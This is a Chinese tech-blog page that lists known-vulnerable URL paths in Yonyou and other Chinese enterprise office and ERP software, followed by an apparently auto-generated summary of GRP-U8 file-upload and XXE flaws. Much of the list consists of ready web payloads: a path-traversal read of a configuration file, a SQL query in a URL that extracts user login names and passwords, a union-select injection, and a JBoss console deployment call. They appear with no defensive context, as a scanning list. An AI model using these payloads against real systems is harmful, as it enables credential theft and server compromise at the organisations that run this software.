用友php漏洞,用友漏洞存在目录整理 | CN-SEC 中文网

/core/public/singleplandetail.jsp /epp/core/public/singleplandetail.jsp?pk=1012F41000000000WA2V /service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false&param_orgpk=level_c /service/~iufo/com.ufida.web.action.ActionServlet /epp/detail/publishinfodetail.jsp?pk_message=1002F410000000019JNX /etail/publishinfodetail.jsp?pk_message=1002F410000000019JNX /seeyon//logs/login.log /management/status.jsp /web/icc/ /epp/html/nodes/upload/supdoc.jsp?pkcorp=1 /NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml /SubModule/Login/index.aspx /uapws/ /ibm/console/ /console/ /xmlrpc /ajax/getemaildata.php?DontCheckLogin=1&filePath=../version.txt /ajax/swfupload.php /login/login.php /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argTy /uapws/service /uapws/service/nc.itf.ses.inittool.PortalSESInitToolService?wsdl ssbu/SiteServer/login.aspx /SiteServer/login.aspx /hrss/rm/RmPsnbasdoc.jsp /hrdac/ /hrm/resource/HrmResourceContactEdit.jsp /web/broswer/SectorInfoBrowser.jsp /web/broswer/CustomerSizeBrowser.jsp /web/broswer/ContacterTitleBrowser.jsp /web/broswer/CityBrowser.jsp /page/maint/common/UserResourceUpload.jsp?dir=/ /ServiceAction/com.eweaver.base.DataAction?sql=select%20LONGONNAME,LOGONPASS%20from%20SYSUSER /cowork/CoworkLogView.jsp?id=151 /system/basedata/basedata_role.jsp?roleid=32 /system/basedata/basedata_hrm.jsp?resourceid=3 /general/email/new/index.php?EMAIL_ID=7 /ikernel/admin/IK_TABLE/field/?TABLE_ID=9%20and%201=2%20union%20select%20user() /mobile/plugin/PreDownload.jsp?url=1 /services/MobileService?wsdl /services

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
引用\[1\]: 用友GRP-U8R10行政事业财务管理软件存在任意文件上传漏洞,攻击者可以通过该漏洞获取服务器权限。\[1\]该漏洞源于应用程序解析XML输入时没有禁止外部实体的加载,导致可加载恶意外部文件。最终产生两种后果,一是可以进行SQL注入,执行SQL语句;二是导致命令执行,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。\[3\]因此,用友GRP-U8高校内控管理软件也可能存在类似的漏洞。请及时更新软件版本或采取其他安全措施以防止潜在的攻击。 #### 引用[.reference_title] - *1* [用友GRP-U8 U8AppProxy任意文件上传漏洞复现+利用](https://blog.csdn.net/qq_41904294/article/details/129693405)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [用友 GRP-U8 Proxy XXE-SQL注入漏洞](https://blog.csdn.net/weixin_46944519/article/details/127225867)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值